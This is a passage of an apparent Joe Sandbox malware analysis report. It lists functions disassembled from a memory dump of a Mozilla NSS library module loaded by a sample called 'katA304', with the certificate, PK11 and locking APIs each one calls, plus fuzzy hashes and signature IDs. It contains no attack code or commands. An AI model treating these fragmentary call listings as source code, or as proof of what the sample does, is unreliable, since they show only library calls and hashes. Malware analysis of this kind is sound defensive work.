                                                              • Part of subcall function 6CA188D0: calloc.MOZGLUE(00000001,6CA2072D,00000000,00000000,00000000,?,6CA20725,00000000,00000058), ref: 6CA18959
                                                              • Part of subcall function 6CA188D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CA18993
                                                              • Part of subcall function 6CA188D0: PR_Unlock.NSS3(?), ref: 6CA189AF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                            • String ID:
                                                            • API String ID: 3394263606-0
                                                            • Opcode ID: 6f5786c61c2ae35af64a951b50a18f1f9047eba2bfe67f742e83fff4be3867dd
                                                            • Instruction ID: 0eeaf1e496dc9c73bc07f151e6e499273293ef99b40aae88a7c72670405ea6bc
                                                            • Opcode Fuzzy Hash: 6f5786c61c2ae35af64a951b50a18f1f9047eba2bfe67f742e83fff4be3867dd
                                                            • Instruction Fuzzy Hash: B0516371A197058FDB00EF78C2846AABBF5BF44358F198569D8989BF10E730E8C4CB91
                                                            Function 6CB19EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19EC0
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19EF9
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19F73
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19FA5
                                                            • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CB19FCF
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19FF2
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB1A01D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterSection
                                                            • String ID:
                                                            • API String ID: 1904992153-0
                                                            • Opcode ID: 20e2b36aff5188512e53642c05bba5a99b78c0ae24bedbdb0590e7bcceea2224
                                                            • Instruction ID: e85faee090398608458e51aa1aee45992c8b7f432bf877762a7e6133ec25f5e2
                                                            • Opcode Fuzzy Hash: 20e2b36aff5188512e53642c05bba5a99b78c0ae24bedbdb0590e7bcceea2224
                                                            • Instruction Fuzzy Hash: 6E518BB2D04640DBCB109F25D98468AB7F4FF08319F25866AD8595BF12E731F889CF92
                                                            Function 6CA0DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_Now.NSS3 ref: 6CA0DCFA
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA0DD40
                                                            • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CA0DD62
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DD71
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA0DD81
                                                            • CERT_RemoveCertListNode.NSS3(?), ref: 6CA0DD8F
                                                              • Part of subcall function 6CA206A0: TlsGetValue.KERNEL32 ref: 6CA206C2
                                                              • Part of subcall function 6CA206A0: EnterCriticalSection.KERNEL32(?), ref: 6CA206D6
                                                              • Part of subcall function 6CA206A0: PR_Unlock.NSS3 ref: 6CA206EB
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DD9E
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DDB7
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                            • String ID:
                                                            • API String ID: 653623313-0
                                                            • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                            • Instruction ID: c4d878c1efdcf3ff19c9bcd12627501a139c472117c539b8881b52d7dcf80d03
                                                            • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                            • Instruction Fuzzy Hash: 802180B6F021169BDB019EA5ED409DFB7B4AF0539CB180024E814A7701F721E999CBE2
                                                            Function 6CA03C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,?,6CA7460B,?,?), ref: 6CA03CA9
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA03CB9
                                                            • PL_HashTableLookup.NSS3(?), ref: 6CA03CC9
                                                            • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA03CD6
                                                            • PR_Unlock.NSS3 ref: 6CA03CE6
                                                            • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CA03CF6
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA03D03
                                                            • PR_Unlock.NSS3 ref: 6CA03D15
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                            • String ID:
                                                            • API String ID: 1376842649-0
                                                            • Opcode ID: 9e717f0d5bf8c87d07c54e026391316d127e36674584d7fc7086bef4f4d1ede4
                                                            • Instruction ID: 6b7a4935cd3f93ad94e2644e682540701470194e0e5aebe74b43ad0c44358f51
                                                            • Opcode Fuzzy Hash: 9e717f0d5bf8c87d07c54e026391316d127e36674584d7fc7086bef4f4d1ede4
                                                            • Instruction Fuzzy Hash: FA11067AF01105BBEB011B25EC05CAA3A3DEB1229CB584530ED5C83611F722D8ACC6D2
                                                            Function 6CA09C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA211C0: PR_NewLock.NSS3 ref: 6CA21216
                                                            • free.MOZGLUE(?), ref: 6CA09E17
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA09E25
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA09E4E
                                                            • TlsGetValue.KERNEL32 ref: 6CA09EA2
                                                              • Part of subcall function 6CA19500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CA19546
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA09EB6
                                                            • PR_Unlock.NSS3 ref: 6CA09ED9
                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA09F18
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                            • String ID:
                                                            • API String ID: 3381623595-0
                                                            • Opcode ID: 52c86c31aad83d4c23595eadbf0319623a5973ad01648504b798f780472192af
                                                            • Instruction ID: ef1c185bd78538cde754345007c6922bd15211a83411f19d7c4684903c99cab8
                                                            • Opcode Fuzzy Hash: 52c86c31aad83d4c23595eadbf0319623a5973ad01648504b798f780472192af
                                                            • Instruction Fuzzy Hash: 9D81C5B5B04701ABE7009F34EE41AAB77A9BF4538CF184528E85987F41FB31E998C791
                                                            Function 6CA1DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(D958E852,6CA21397,5B5F5EC0,?,?,6CA1B1EE,2404110F,?,?), ref: 6CA1AB3C
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(D958E836,?,6CA1B1EE,2404110F,?,?), ref: 6CA1AB49
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(5D5E6CC1), ref: 6CA1AB5C
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(5D5E6CB5), ref: 6CA1AB63
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CA1AB6F
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CA1AB76
                                                            • TlsGetValue.KERNEL32 ref: 6CA1DCFA
                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CA1DD0E
                                                            • PK11_IsFriendly.NSS3(?), ref: 6CA1DD73
                                                            • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CA1DD8B
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1DE81
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA1DEA6
                                                            • PR_Unlock.NSS3(?), ref: 6CA1DF08
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                            • String ID:
                                                            • API String ID: 519503562-0
                                                            • Opcode ID: 962a73326c0e16926dea95e0f75a52ac4ac053f56581102dcb3a956a23aaa876
                                                            • Instruction ID: df547fb2dea4371e187f6bb3a1b1a5697b12f4b2768363f82e88b7ee5ab3021f
                                                            • Opcode Fuzzy Hash: 962a73326c0e16926dea95e0f75a52ac4ac053f56581102dcb3a956a23aaa876
                                                            • Instruction Fuzzy Hash: 9E91E4B5E051019FEB01CF68D980BAAB7B6FF54309F194028DC199BF41E731E999CB91
                                                            Function 6C9F2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: __allrem
                                                            • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                            • API String ID: 2933888876-3221253098
                                                            • Opcode ID: 50dd19434b967d43837ce5f1ac4a4fed73c997c4877d066c06606a93ca6b1177
                                                            • Instruction ID: ca53917dfc958078818b99863f62b521f3b1bb8e2e5482243e17b7f44d0a8f0e
                                                            • Opcode Fuzzy Hash: 50dd19434b967d43837ce5f1ac4a4fed73c997c4877d066c06606a93ca6b1177
                                                            • Instruction Fuzzy Hash: E861AE75B006449FDB04CF68DC94BAA77B5FF4A314F208628E9299B790DB35EC06CB91
                                                            Function 6CA2DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA2DF37
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA2DF4B
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2DF96
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA2E02B
                                                            • PR_Unlock.NSS3(?), ref: 6CA2E07E
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA2E090
                                                            • PR_Unlock.NSS3(?), ref: 6CA2E0AF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Error$Unlock$CriticalEnterSectionValue
                                                            • String ID:
                                                            • API String ID: 4073542275-0
                                                            • Opcode ID: d9eda54b40100d1ee91decaf128c5f78c8441afa4cc96be368d8da66e82f2bbe
                                                            • Instruction ID: f44c29ef0ec807857e5ea0599128a2a49e9a79c9514008484db83d65a43ab37f
                                                            • Opcode Fuzzy Hash: d9eda54b40100d1ee91decaf128c5f78c8441afa4cc96be368d8da66e82f2bbe
                                                            • Instruction Fuzzy Hash: 3A51D131A446108FEB209F25C844B66B3B5FF44319F284928E89A47F91D739E8C9CBD2
                                                            Function 6CA2BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CERT_NewCertList.NSS3 ref: 6CA2BD1E
                                                              • Part of subcall function 6CA02F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA02F0A
                                                              • Part of subcall function 6CA02F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA02F1D
                                                              • Part of subcall function 6CA457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA0B41E,00000000,00000000,?,00000000,?,6CA0B41E,00000000,00000000,00000001,?), ref: 6CA457E0
                                                              • Part of subcall function 6CA457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA45843
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA2BD8C
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CA2BD9B
                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CA2BDA9
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BE3A
                                                              • Part of subcall function 6CA03E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA03EC2
                                                              • Part of subcall function 6CA03E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA03ED6
                                                              • Part of subcall function 6CA03E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA03EEE
                                                              • Part of subcall function 6CA03E60: PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA03F02
                                                              • Part of subcall function 6CA03E60: PL_FreeArenaPool.NSS3 ref: 6CA03F14
                                                              • Part of subcall function 6CA03E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA03F27
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BE52
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA02CDA,?,00000000), ref: 6CA02E1E
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA02E33
                                                              • Part of subcall function 6CA02E00: TlsGetValue.KERNEL32 ref: 6CA02E4E
                                                              • Part of subcall function 6CA02E00: EnterCriticalSection.KERNEL32(?), ref: 6CA02E5E
                                                              • Part of subcall function 6CA02E00: PL_HashTableLookup.NSS3(?), ref: 6CA02E71
                                                              • Part of subcall function 6CA02E00: PL_HashTableRemove.NSS3(?), ref: 6CA02E84
                                                              • Part of subcall function 6CA02E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA02E96
                                                              • Part of subcall function 6CA02E00: PR_Unlock.NSS3 ref: 6CA02EA9
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA2BE61
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                            • String ID:
                                                            • API String ID: 2178860483-0
                                                            • Opcode ID: 1a28426e1b970ec1cfbdfa6704f61cd752ebd1ce5910b8fbc9e2a86ab296eb84
                                                            • Instruction ID: 7f0e1ffa9aa0e3b1d6c5d81852542a9dfdfe7ef06e7b27bffcad41d56e14c54b
                                                            • Opcode Fuzzy Hash: 1a28426e1b970ec1cfbdfa6704f61cd752ebd1ce5910b8fbc9e2a86ab296eb84
                                                            • Instruction Fuzzy Hash: B241F6B5A002209FD710CF28ED80BAA77F4EF44758F588268F94997751E735EC98CB92
                                                            Function 6CA4AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CA4AB3E,?,?,?), ref: 6CA4AC35
                                                              • Part of subcall function 6CA2CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA2CF16
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CA4AB3E,?,?,?), ref: 6CA4AC55
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA4AB3E,?,?), ref: 6CA4AC70
                                                              • Part of subcall function 6CA2E300: TlsGetValue.KERNEL32 ref: 6CA2E33C
                                                              • Part of subcall function 6CA2E300: EnterCriticalSection.KERNEL32(?), ref: 6CA2E350
                                                              • Part of subcall function 6CA2E300: PR_Unlock.NSS3(?), ref: 6CA2E5BC
                                                              • Part of subcall function 6CA2E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CA2E5CA
                                                              • Part of subcall function 6CA2E300: TlsGetValue.KERNEL32 ref: 6CA2E5F2
                                                              • Part of subcall function 6CA2E300: EnterCriticalSection.KERNEL32(?), ref: 6CA2E606
                                                              • Part of subcall function 6CA2E300: PORT_Alloc_Util.NSS3(?), ref: 6CA2E613
                                                            • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CA4AC92
                                                            • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA4AB3E), ref: 6CA4ACD7
                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CA4AD10
                                                            • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CA4AD2B
                                                              • Part of subcall function 6CA2F360: TlsGetValue.KERNEL32(00000000,?,6CA4A904,?), ref: 6CA2F38B
                                                              • Part of subcall function 6CA2F360: EnterCriticalSection.KERNEL32(?,?,?,6CA4A904,?), ref: 6CA2F3A0
                                                              • Part of subcall function 6CA2F360: PR_Unlock.NSS3(?,?,?,?,6CA4A904,?), ref: 6CA2F3D3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                            • String ID:
                                                            • API String ID: 2926855110-0
                                                            • Opcode ID: dc297c94c70319c875802cddcd5a47e77d736f8b363f315429ad3fa5b50c8241
                                                            • Instruction ID: 19802c209efa3185f3157286ed5bf9654f0d20a796f5847c04e4217533c5f6fe
                                                            • Opcode Fuzzy Hash: dc297c94c70319c875802cddcd5a47e77d736f8b363f315429ad3fa5b50c8241
                                                            • Instruction Fuzzy Hash: A03106B1E006159FEB008F699C409AF7667AF84728B1DC138E8159BB40EB31DD9987A1
                                                            Function 6CA28C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_Now.NSS3 ref: 6CA28C7C
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA28CB0
                                                            • TlsGetValue.KERNEL32 ref: 6CA28CD1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA28CE5
                                                            • PR_Unlock.NSS3(?), ref: 6CA28D2E
